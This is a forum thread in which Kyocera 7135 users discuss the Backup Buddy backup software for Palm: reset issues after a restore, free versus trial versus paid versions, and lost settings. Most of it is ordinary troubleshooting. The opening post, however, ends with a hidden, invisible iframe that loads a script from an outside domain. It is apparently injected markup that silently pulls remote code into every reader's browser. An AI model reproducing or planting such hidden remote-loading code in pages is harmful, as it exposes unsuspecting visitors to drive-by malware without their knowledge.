+ Reply to Thread

Backup Buddy restore

I've been using the 7135 for less than a day, and I noticed that after I do BB restore, I need to do a soft reset, or it will freeze and hard reset itself.

Anyone else see this? If others see this, we should make a FAQ.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Backup Buddy restore

Originally posted by KLiuLess
    I've been using the 7135 for less than a day, and I noticed that after I do BB restore, I need to do a soft reset, or it will freeze and hard reset itself.

Anyone else see this? If others see this, we should make a FAQ.
    I've noticed that as well. When you do a restore, you are replacing the guts of the phone. Since those guts were not present during the last reset, the phone can not reconginze them properly and is looking for the old copy which is nonexistent.
    It's along the same lines why you need a soft reset after you install a ringer, it's so the hardware can reconginze the software.

Yes, I was under the same impression.
    I wish BB would have a dialog box with a "reset" button you had to press. That way you can't mess with anything until you're reset.

Re: Free copy of Backup Buddy

I just got my new card and before I download the free trial of backup buddy that I take it is on the applications CD as a free trial.
    My question is: I don't want to pay for a program just yet, until I try a few different ones out. I know the free trial download on the CD allow will allow me to back up the 7135 now but does it expire after 30 days and render my ability to restore useless. I realize the paid version from reading the threads here offers incremental back ups, but for now I just want to back up the whole system, now that I have 400 records on it. I don't want to have the program unusable if I get a fatal reset several weeks from now when I 'm on the road and have not purchased the program yet. Is the program done once it expires?

My understanding is that the free version of BackupBuddy VFS will work forever. Check out their website and I believe its available there? The difference is that the free version (basic) requires you to manually initiate backups and it backs up *everything* in ram. Restore is the same.
    The paid version allows one to schedule automatic backups (either when turning off the palm or at one particular time of day). The backups are incremental (if the file hasn't changed it isn't copied to the card). You can select which files are to be included in the backup and which aren't. On restore you again have the option of selecting particular or all files.
    -Quick

Thanks for your response Quick. Their site was informative but still not clear or don't understand if after 30 days it says vfs version stops working does the Backup buddy part still work with the basics.
    Palm III, V>6035>7135>6035>650>700p>755p (on Vzn), Palm's BT Treo Hdset,

From their site:
    Note regarding BackupBuddyVFS:Free

BackupBuddyVFS:Free is the free, limited version of BackupBuddyVFS. BackupBuddyVFS:Free enables you to back up all or your organizer’s files to and restore all of your backup data from your organizer’s expansion card. With the free version, you are not able to select individual files for back up or restore, schedule automatic back ups or perform the other advanced features described below and in the BackupBuddyVFS manual
    I didn't see anything about 30 days... maybe I'm the wrong one to answer. I bought BackupBuddy years ago for my Palm V and have been getting free upgrades since. BackupBuddy VFS (full version) came with one of those.
    -Quick

I've restored several times without the need to reset. I do get a dialog box stating that the address book on the palm is newer than the file being restored and I answer no to all with no problems.

Do you have the full version of the free one? Also, what version are you using? I'm using BackupBuddyVFS 2.02. I haven't done a restore using the desktop version so maybe that is the difference.

One more thing....I did a restore this afternoon after I loaded Beyond Contacts (what a waste but thats a bunny trail) Anyway, it restored everything perfect except my seinfeld ringer and my holy grail SMS notification.

30 day free trial . .

This was on the next page at their website once you hit the download link:

BackupBuddyVFS Trial Version

You may download a trial version of BackupBuddyVFS below. The trial version provides you with full functionality for the first 30 days. After 30 days, BackupBuddyVFS will be disabled. To register (i.e. purchase), please visit the purchase center.

"The price of a registered version for new users is $16.95 for a single user license. The registration is valid for use on one Palm Powered™organizer. If you would like to synchronize additional organizers, please contact Blue Nomad for additional licenses".

So What I don't get is they say backup buddy vfs will be disabled after 30 days.
    Their FAQ says you can't run each on your device at the same time. So after 30 days what do yo do download the plain Backup Buddy version until you decide to buy the full featured vfs version . . . this is as bad as trying to understand Kyo's user guide.

On another note: sorry to hear about that last poster's loss of his seinfeld ringer . . . bummer . . . what did sound like? did it ring and tell a dry joke like " why are apples red anyway, where did that color come from . . ring ring" Ha Ha ha

If you don't intend on ever buying Backup Buddy VFS, just download the free one and use it. The trial version is just that. A trial. When and if you want to make it official, you buy it and they let you download the licensed one. Simple as that.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

There you have it... Its only the full version trial that will disable after 30 days. Maybe we don't understand what you are asking? The free version will work forever. The trial will disable itself after 30 days. If you try the trial and don't want to buy the full version then you would delete it, download the free version (if you wanted) and use that. You would only be at risk from the time you deleted the full version and downloaded the free version and ran it. Maybe not even then? I think there is a good chance that the free version would restore a backup made by the full version.

Hmmm. I'll have to read the manual now. I forget what it does if you back up, delete a file from ram and then back up again (man am i lazy or what?).

-Quick

Expidia--

I retrieved the Seinfeld ringer off SPS. I think Steve generated it and its the initial bass theme song. Its very good quality and I'll be reloading it along with my holy grail sound soon.

I think its money well spent for the VFS version. BackupBuddy VFS and the SD port are the primary reasons I bought the 7135. My 6035 crashed hard on three seperate trips leaving me helpless, with the 7135 and BB VFS I'm totally covered.

Hi. I have the free version of backup buddy and so far i havent been able to get it to restore properly. It hangs at qsimport?
    This I take it is a quick office file. I dont really have any programs installed except quick office-the free version and xmap. This is the second phone from kyocera. the first one quit in less than a month.
    I ran the restore from the card when trying to do the restore. This is the way they said to run it. I am new to pda's this being the first one. Good choice?? Any help would be appreciated.

Originally posted by impalass
    Hi. I have the free version of backup buddy and so far i havent been able to get it to restore properly. It hangs at qsimport?
    This I take it is a quick office file. I dont really have any programs installed except quick office-the free version and xmap. This is the second phone from kyocera. the first one quit in less than a month.
    I ran the restore from the card when trying to do the restore. This is the way they said to run it. I am new to pda's this being the first one. Good choice?? Any help would be appreciated.
    Just a guess, but you might try deleting quick office off your computer and the 7135. Then reinstall the 7135 software. Then back up and restore to see if the phones works ok. Then download another fresh copy of Quick office and back up and restore again.

Today, I bought the full version of backup buddy because I wanted the program to do 3am backups each morningt. I found myself adding info and forgetting to back it up until a few days later. The paid version $16.95 does autobackups.
    Good Luck!

Not wanting to lecture but...

As a BB user since I began using Palm handhelds many years ago (?'96) I heartily recommend it as probably the best investment of a few dollars one can make toward a PDA. Of all the Palm programs out there, I can think of only one ESSENTIAL program...BackUp Buddy. I have absolutely no financial interests or friendships allied to the makers of this product, only trying to help folks who don't use it or similar products. Dataloss is a *****.

will the FULL version of backup buddy save ALL my data ?

ok i have the free version of backup buddy and after a restore i have to enter all my app ser#'s again and i also have to redo all my phone speed dials and voice dials. will the paid version save ALL my data? if so i am getting it today. ++++ craig
    www.EmailPush.com
    Email + SMS = Power

Re: will the FULL version of backup buddy save ALL my data ?

Originally posted by EmailPush.com
    ok i have the free version of backup buddy and after a restore i have to enter all my app ser#'s again and i also have to redo all my phone speed dials and voice dials. will the paid version save ALL my data? if so i am getting it today. ++++ craig
    Weird. You shouldn't have to do that with the free version. However, just so you know ... I have the paid version (yes, I paid for it), and I have never had to re-enter serial #'s or voice dials after a BBVFS restore.
    Michael

After you restore, some preferences are not yet rewritten. You'll probably notice that there's no Hotsync identity, for instance. That's why, I think, you have to register again.

The cure is simple. First restore, then soft reset. That works for me.

I do find I have to do two other things:

1. Go back into FontHack and specify its settings again. If I leave it one without doing that, the Palm keeps bombing.

2. Tell Launcher X to refresh, if you don't have it set to do so automatically.

That's it.

I've had the same issue with restoring voice tags and speed dial #'s (with the paid version), although that may have had something to do with restoring to a replacement handset.